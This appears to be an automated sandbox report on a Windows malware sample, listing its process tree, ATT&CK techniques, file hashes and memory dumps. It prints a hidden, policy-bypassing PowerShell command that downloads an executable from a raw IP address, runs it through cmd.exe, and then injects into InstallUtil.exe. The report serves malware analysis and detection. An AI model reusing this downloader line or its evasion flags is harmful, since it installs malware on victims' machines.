C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2020

C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
4⤵
PID:676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1160

C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
4⤵
PID:1608

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2004

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b89e63484dc9c78b94f63337a140cc11

SHA1
394026ca31ad6ad3a73584dbd345fe64eb29114c

SHA256
e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

SHA512
9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b89e63484dc9c78b94f63337a140cc11

SHA1
394026ca31ad6ad3a73584dbd345fe64eb29114c

SHA256
e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

SHA512
9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b89e63484dc9c78b94f63337a140cc11

SHA1
394026ca31ad6ad3a73584dbd345fe64eb29114c

SHA256
e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

SHA512
9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b89e63484dc9c78b94f63337a140cc11

SHA1
394026ca31ad6ad3a73584dbd345fe64eb29114c

SHA256
e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

SHA512
9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b89e63484dc9c78b94f63337a140cc11

SHA1
394026ca31ad6ad3a73584dbd345fe64eb29114c

SHA256
e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

SHA512
9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gruaeg\Bblqwrox.exe

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gruaeg\Bblqwrox.exe

Filesize
75KB

MD5
59b5570fd782ef0503a49fd7470200b6

SHA1
1738e6b2ecb79b85e950a9734469404002cbb195

SHA256
f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

SHA512
2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

Download Submit
C:\Users\Admin\AppData\Roaming\new.exe

Filesize
75KB

MD5
59b5570fd782ef0503a49fd7470200b6

SHA1
1738e6b2ecb79b85e950a9734469404002cbb195

SHA256
f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

SHA512
2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

Download Submit
C:\Users\Admin\AppData\Roaming\new.exe

Filesize
75KB

MD5
59b5570fd782ef0503a49fd7470200b6

SHA1
1738e6b2ecb79b85e950a9734469404002cbb195

SHA256
f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

SHA512
2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

Download Submit
C:\Users\Admin\AppData\Roaming\new.exe

Filesize
75KB

MD5
59b5570fd782ef0503a49fd7470200b6

SHA1
1738e6b2ecb79b85e950a9734469404002cbb195

SHA256
f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

SHA512
2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

Download Submit
C:\Users\Admin\AppData\Roaming\new.exe

Filesize
75KB

MD5
59b5570fd782ef0503a49fd7470200b6

SHA1
1738e6b2ecb79b85e950a9734469404002cbb195

SHA256
f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

SHA512
2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

Download Submit
\Users\Admin\AppData\Roaming\new.exe

Filesize
75KB

MD5
59b5570fd782ef0503a49fd7470200b6

SHA1
1738e6b2ecb79b85e950a9734469404002cbb195

SHA256
f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

SHA512
2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

Download Submit
\Users\Admin\AppData\Roaming\new.exe

Filesize
75KB

MD5
59b5570fd782ef0503a49fd7470200b6

SHA1
1738e6b2ecb79b85e950a9734469404002cbb195

SHA256
f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

SHA512
2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

Download Submit
\Users\Admin\AppData\Roaming\new.exe

Filesize
75KB

MD5
59b5570fd782ef0503a49fd7470200b6

SHA1
1738e6b2ecb79b85e950a9734469404002cbb195

SHA256
f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

SHA512
2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

Download Submit
memory/544-134-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/544-138-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/544-104-0x0000000000000000-mapping.dmp

Download
memory/544-112-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/676-152-0x000000000040242D-mapping.dmp

Download
memory/676-172-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1048-78-0x00000000719ED000-0x00000000719F8000-memory.dmp

Filesize
44KB

Download
memory/1048-54-0x0000000072F81000-0x0000000072F84000-memory.dmp

Filesize
12KB

Download
memory/1048-58-0x00000000719ED000-0x00000000719F8000-memory.dmp

Filesize
44KB

Download
memory/1048-55-0x0000000070A01000-0x0000000070A03000-memory.dmp

Filesize
8KB

Download
memory/1048-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1048-57-0x0000000075C51000-0x0000000075C53000-memory.dmp

Filesize
8KB

Download
memory/1052-61-0x000000006B3F0000-0x000000006B99B000-memory.dmp

Filesize
5.7MB

Download
memory/1052-59-0x0000000000000000-mapping.dmp

Download
memory/1052-62-0x000000006B3F0000-0x000000006B99B000-memory.dmp

Filesize
5.7MB

Download
memory/1160-99-0x0000000000000000-mapping.dmp

Download
memory/1300-81-0x0000000000000000-mapping.dmp

Download
memory/1300-87-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1300-86-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1300-85-0x0000000004D70000-0x0000000005042000-memory.dmp

Filesize
2.8MB

Download
memory/1344-90-0x0000000000000000-mapping.dmp

Download
memory/1464-91-0x0000000000000000-mapping.dmp

Download
memory/1464-97-0x0000000004CF0000-0x0000000004FC2000-memory.dmp

Filesize
2.8MB

Download
memory/1464-98-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1504-63-0x0000000000000000-mapping.dmp

Download
memory/1548-66-0x0000000000000000-mapping.dmp

Download
memory/1548-72-0x0000000004300000-0x000000000434C000-memory.dmp

Filesize
304KB

Download
memory/1548-71-0x0000000000440000-0x0000000000480000-memory.dmp

Filesize
256KB

Download
memory/1548-70-0x0000000002080000-0x00000000020E0000-memory.dmp

Filesize
384KB

Download
memory/1548-68-0x00000000009A0000-0x00000000009B8000-memory.dmp

Filesize
96KB

Download
memory/1608-168-0x000000000040242D-mapping.dmp

Download
memory/1608-173-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1676-101-0x0000000000000000-mapping.dmp

Download
memory/1772-73-0x0000000000000000-mapping.dmp

Download
memory/1772-117-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1772-77-0x0000000004C30000-0x0000000004F02000-memory.dmp

Filesize
2.8MB

Download
memory/1772-79-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1772-80-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1772-116-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1880-119-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-124-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-127-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-128-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-129-0x000000000040242D-mapping.dmp

Download
memory/1880-132-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-133-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-125-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-118-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-123-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1880-121-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1916-136-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1916-139-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/1916-114-0x0000000004D30000-0x0000000005002000-memory.dmp

Filesize
2.8MB

Download
memory/1916-108-0x0000000000000000-mapping.dmp

Download
memory/1916-115-0x0000000067690000-0x0000000067C3B000-memory.dmp

Filesize
5.7MB

Download
memory/2004-137-0x000007FEFC3E1000-0x000007FEFC3E3000-memory.dmp

Filesize
8KB

Download
memory/2004-135-0x0000000000000000-mapping.dmp

Download
memory/2020-88-0x0000000000000000-mapping.dmp

Download